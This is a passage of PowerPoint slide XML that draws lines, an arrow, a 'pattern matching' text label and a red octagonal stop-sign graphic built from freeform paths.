              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1872"/>
              <a:ext cx="144" cy="14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937" name="Line 1079">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E883BC38-632A-4EE4-9FC8-C2AABD049222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2688" y="1344"/>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38" name="Line 1080">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A5850F-A593-44FE-B0D5-BE14951F7D2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2928" y="1344"/>
              <a:ext cx="192" cy="192"/>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39" name="Line 1081">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73901CCC-26F6-4F01-9489-4C69D65828DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2928" y="1680"/>
              <a:ext cx="14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40" name="Line 1082">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78849751-EAF2-4B9D-AA6E-C81660BE6273}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3216" y="1680"/>
              <a:ext cx="144" cy="144"/>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41" name="Text Box 1083">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F229160-793A-4147-8A63-04A7FEFFEAED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3072" y="912"/>
              <a:ext cx="96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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>pattern matching</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122942" name="AutoShape 1084">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2573BB38-F600-4857-9099-C32396AB2135}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632" y="1680"/>
              <a:ext cx="768" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 20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22943" name="Group 1085">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FDC36AE-B835-41C1-8F05-AB075E61FFEC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4271" y="1680"/>
              <a:ext cx="576" cy="528"/>
              <a:chOff x="3942" y="2453"/>
              <a:chExt cx="771" cy="621"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122953" name="Freeform 1086">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337819D7-7A3A-4B66-AF1C-272D8BB541C7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3942" y="2453"/>
                <a:ext cx="771" cy="621"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1544"/>
                  <a:gd name="T1" fmla="*/ 0 h 1864"/>
                  <a:gd name="T2" fmla="*/ 0 w 1544"/>
                  <a:gd name="T3" fmla="*/ 0 h 1864"/>
                  <a:gd name="T4" fmla="*/ 0 w 1544"/>
                  <a:gd name="T5" fmla="*/ 0 h 1864"/>
                  <a:gd name="T6" fmla="*/ 0 w 1544"/>
                  <a:gd name="T7" fmla="*/ 0 h 1864"/>
                  <a:gd name="T8" fmla="*/ 0 w 1544"/>
                  <a:gd name="T9" fmla="*/ 0 h 1864"/>
                  <a:gd name="T10" fmla="*/ 0 w 1544"/>
                  <a:gd name="T11" fmla="*/ 0 h 1864"/>
                  <a:gd name="T12" fmla="*/ 0 w 1544"/>
                  <a:gd name="T13" fmla="*/ 0 h 1864"/>
                  <a:gd name="T14" fmla="*/ 0 w 1544"/>
                  <a:gd name="T15" fmla="*/ 0 h 1864"/>
                  <a:gd name="T16" fmla="*/ 0 w 1544"/>
                  <a:gd name="T17" fmla="*/ 0 h 18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44"/>
                  <a:gd name="T28" fmla="*/ 0 h 1864"/>
                  <a:gd name="T29" fmla="*/ 1544 w 1544"/>
                  <a:gd name="T30" fmla="*/ 1864 h 18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44" h="1864">
                    <a:moveTo>
                      <a:pt x="0" y="532"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="471" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1072" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1544" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1544" y="1299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1072" y="1864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="1864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="532"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="7938">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122954" name="Freeform 1087">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6EEC00A-5379-487E-97D9-E7F33009DAB5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3994" y="2495"/>
                <a:ext cx="667" cy="537"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1335"/>
                  <a:gd name="T1" fmla="*/ 0 h 1610"/>
                  <a:gd name="T2" fmla="*/ 0 w 1335"/>
                  <a:gd name="T3" fmla="*/ 0 h 1610"/>
                  <a:gd name="T4" fmla="*/ 0 w 1335"/>
                  <a:gd name="T5" fmla="*/ 0 h 1610"/>
                  <a:gd name="T6" fmla="*/ 0 w 1335"/>
                  <a:gd name="T7" fmla="*/ 0 h 1610"/>
                  <a:gd name="T8" fmla="*/ 0 w 1335"/>
                  <a:gd name="T9" fmla="*/ 0 h 1610"/>
                  <a:gd name="T10" fmla="*/ 0 w 1335"/>
                  <a:gd name="T11" fmla="*/ 0 h 1610"/>
                  <a:gd name="T12" fmla="*/ 0 w 1335"/>
                  <a:gd name="T13" fmla="*/ 0 h 1610"/>
                  <a:gd name="T14" fmla="*/ 0 w 1335"/>
                  <a:gd name="T15" fmla="*/ 0 h 1610"/>
                  <a:gd name="T16" fmla="*/ 0 w 1335"/>
                  <a:gd name="T17" fmla="*/ 0 h 1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5"/>
                  <a:gd name="T28" fmla="*/ 0 h 1610"/>
                  <a:gd name="T29" fmla="*/ 1335 w 1335"/>
                  <a:gd name="T30" fmla="*/ 1610 h 16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5" h="1610">
                    <a:moveTo>
                      <a:pt x="0" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="408" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="928" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="928" y="1610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="1610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="777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22955" name="Freeform 1088">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2088F0-D260-4846-924D-557E8AEC28D2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3994" y="2495"/>
                <a:ext cx="667" cy="537"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1335"/>
                  <a:gd name="T1" fmla="*/ 0 h 1610"/>
                  <a:gd name="T2" fmla="*/ 0 w 1335"/>
                  <a:gd name="T3" fmla="*/ 0 h 1610"/>
                  <a:gd name="T4" fmla="*/ 0 w 1335"/>
                  <a:gd name="T5" fmla="*/ 0 h 1610"/>
                  <a:gd name="T6" fmla="*/ 0 w 1335"/>
                  <a:gd name="T7" fmla="*/ 0 h 1610"/>
                  <a:gd name="T8" fmla="*/ 0 w 1335"/>
                  <a:gd name="T9" fmla="*/ 0 h 1610"/>
                  <a:gd name="T10" fmla="*/ 0 w 1335"/>
                  <a:gd name="T11" fmla="*/ 0 h 1610"/>
                  <a:gd name="T12" fmla="*/ 0 w 1335"/>
                  <a:gd name="T13" fmla="*/ 0 h 1610"/>
                  <a:gd name="T14" fmla="*/ 0 w 1335"/>
                  <a:gd name="T15" fmla="*/ 0 h 1610"/>
                  <a:gd name="T16" fmla="*/ 0 w 1335"/>
                  <a:gd name="T17" fmla="*/ 0 h 1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5"/>
                  <a:gd name="T28" fmla="*/ 0 h 1610"/>
                  <a:gd name="T29" fmla="*/ 1335 w 1335"/>
                  <a:gd name="T30" fmla="*/ 1610 h 16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5" h="1610">
                    <a:moveTo>
                      <a:pt x="0" y="459"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="406" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="927" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="927" y="1610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="1610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="459"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="460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2944" name="Group 1089">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E567070-ECE0-441B-BE95-5CF4AACC767A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4368" y="1824"/>
              <a:ext cx="383" cy="248"/>
              <a:chOff x="4033" y="2627"/>
              <a:chExt cx="589" cy="261"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122947" name="Freeform 1090">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7085B63F-F1AA-4009-8678-B1E8E848E17A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4490" y="2627"/>
                <a:ext cx="132" cy="261"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 263"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 1 w 263"/>
                  <a:gd name="T3" fmla="*/ 0 h 782"/>
                  <a:gd name="T4" fmla="*/ 1 w 263"/>
                  <a:gd name="T5" fmla="*/ 0 h 782"/>
                  <a:gd name="T6" fmla="*/ 1 w 263"/>
                  <a:gd name="T7" fmla="*/ 0 h 782"/>
                  <a:gd name="T8" fmla="*/ 1 w 263"/>
                  <a:gd name="T9" fmla="*/ 0 h 782"/>
                  <a:gd name="T10" fmla="*/ 1 w 263"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 1 w 263"/>
                  <a:gd name="T13" fmla="*/ 0 h 782"/>
                  <a:gd name="T14" fmla="*/ 0 w 263"/>
                  <a:gd name="T15" fmla="*/ 0 h 782"/>
                  <a:gd name="T16" fmla="*/ 0 w 263"/>
                  <a:gd name="T17" fmla="*/ 0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3"/>
                  <a:gd name="T28" fmla="*/ 0 h 782"/>
                  <a:gd name="T29" fmla="*/ 263 w 263"/>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3" h="782">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="7938">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122948" name="Freeform 1091">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14E0895D-3DE4-4A0A-B21E-793E2C641B42}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4325" y="2627"/>
                <a:ext cx="141" cy="261"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 283"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 0 w 283"/>
                  <a:gd name="T3" fmla="*/ 0 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 283"/>
                  <a:gd name="T5" fmla="*/ 0 h 782"/>
                  <a:gd name="T6" fmla="*/ 0 w 283"/>
                  <a:gd name="T7" fmla="*/ 0 h 782"/>
                  <a:gd name="T8" fmla="*/ 0 w 283"/>
                  <a:gd name="T9" fmla="*/ 0 h 782"/>
                  <a:gd name="T10" fmla="*/ 0 w 283"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 0 w 283"/>
                  <a:gd name="T13" fmla="*/ 0 h 782"/>
                  <a:gd name="T14" fmla="*/ 0 w 283"/>
                  <a:gd name="T15" fmla="*/ 0 h 782"/>
                  <a:gd name="T16" fmla="*/ 0 w 283"/>
                  <a:gd name="T17" fmla="*/ 0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3"/>
                  <a:gd name="T28" fmla="*/ 0 h 782"/>
                  <a:gd name="T29" fmla="*/ 283 w 283"/>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3" h="782">
                    <a:moveTo>
                      <a:pt x="79" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="7938">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122949" name="Freeform 1092">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC459505-FC57-4CD5-84BF-78EEDC9B6011}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4033" y="2627"/>
                <a:ext cx="131" cy="261"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 264"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 0 w 264"/>
                  <a:gd name="T3" fmla="*/ 0 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 264"/>
                  <a:gd name="T5" fmla="*/ 0 h 782"/>
                  <a:gd name="T6" fmla="*/ 0 w 264"/>
                  <a:gd name="T7" fmla="*/ 0 h 782"/>
                  <a:gd name="T8" fmla="*/ 0 w 264"/>
                  <a:gd name="T9" fmla="*/ 0 h 782"/>
                  <a:gd name="T10" fmla="*/ 0 w 264"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 0 w 264"/>
                  <a:gd name="T13" fmla="*/ 0 h 782"/>
                  <a:gd name="T14" fmla="*/ 0 w 264"/>
                  <a:gd name="T15" fmla="*/ 0 h 782"/>
                  <a:gd name="T16" fmla="*/ 0 w 264"/>
                  <a:gd name="T17" fmla="*/ 0 h 782"/>
                  <a:gd name="T18" fmla="*/ 0 w 264"/>
                  <a:gd name="T19" fmla="*/ 0 h 782"/>
                  <a:gd name="T20" fmla="*/ 0 w 264"/>
                  <a:gd name="T21" fmla="*/ 0 h 782"/>
                  <a:gd name="T22" fmla="*/ 0 w 264"/>
                  <a:gd name="T23" fmla="*/ 0 h 782"/>
                  <a:gd name="T24" fmla="*/ 0 w 264"/>
                  <a:gd name="T25" fmla="*/ 0 h 782"/>
                  <a:gd name="T26" fmla="*/ 0 w 264"/>
                  <a:gd name="T27" fmla="*/ 0 h 782"/>
                  <a:gd name="T28" fmla="*/ 0 w 264"/>
                  <a:gd name="T29" fmla="*/ 0 h 782"/>
                  <a:gd name="T30" fmla="*/ 0 w 264"/>
                  <a:gd name="T31" fmla="*/ 0 h 782"/>
                  <a:gd name="T32" fmla="*/ 0 w 264"/>
                  <a:gd name="T33" fmla="*/ 0 h 782"/>
                  <a:gd name="T34" fmla="*/ 0 w 264"/>
                  <a:gd name="T35" fmla="*/ 0 h 782"/>
                  <a:gd name="T36" fmla="*/ 0 w 264"/>
                  <a:gd name="T37" fmla="*/ 0 h 782"/>
                  <a:gd name="T38" fmla="*/ 0 w 264"/>
                  <a:gd name="T39" fmla="*/ 0 h 782"/>
                  <a:gd name="T40" fmla="*/ 0 w 264"/>
                  <a:gd name="T41" fmla="*/ 0 h 782"/>
                  <a:gd name="T42" fmla="*/ 0 w 264"/>
                  <a:gd name="T43" fmla="*/ 0 h 782"/>
                  <a:gd name="T44" fmla="*/ 0 w 264"/>
                  <a:gd name="T45" fmla="*/ 0 h 7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4"/>
                  <a:gd name="T70" fmla="*/ 0 h 782"/>
                  <a:gd name="T71" fmla="*/ 264 w 264"/>
                  <a:gd name="T72" fmla="*/ 782 h 78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4" h="782">
                    <a:moveTo>
                      <a:pt x="68" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="7938">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="zh-CN" altLang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="122950" name="Freeform 1093">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E1B5A6-1354-49CB-AA9F-E3505F6A8AA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4189" y="2627"/>
                <a:ext cx="121" cy="261"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 242"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 1 w 242"/>
                  <a:gd name="T3" fmla="*/ 0 h 782"/>
                  <a:gd name="T4" fmla="*/ 1 w 242"/>
                  <a:gd name="T5" fmla="*/ 0 h 782"/>
                  <a:gd name="T6" fmla="*/ 1 w 242"/>
                  <a:gd name="T7" fmla="*/ 0 h 782"/>
                  <a:gd name="T8" fmla="*/ 1 w 242"/>
                  <a:gd name="T9" fmla="*/ 0 h 782"/>
                  <a:gd name="T10" fmla="*/ 1 w 242"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 1 w 242"/>
                  <a:gd name="T13" fmla="*/ 0 h 782"/>
                  <a:gd name="T14" fmla="*/ 0 w 242"/>
                  <a:gd name="T15" fmla="*/ 0 h 782"/>
                  <a:gd name="T16" fmla="*/ 0 w 242"/>
                  <a:gd name="T17" fmla="*/ 0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2"/>
                  <a:gd name="T28" fmla="*/ 0 h 782"/>
                  <a:gd name="T29" fmla="*/ 242 w 242"/>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2" h="782">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="242" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="7938">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
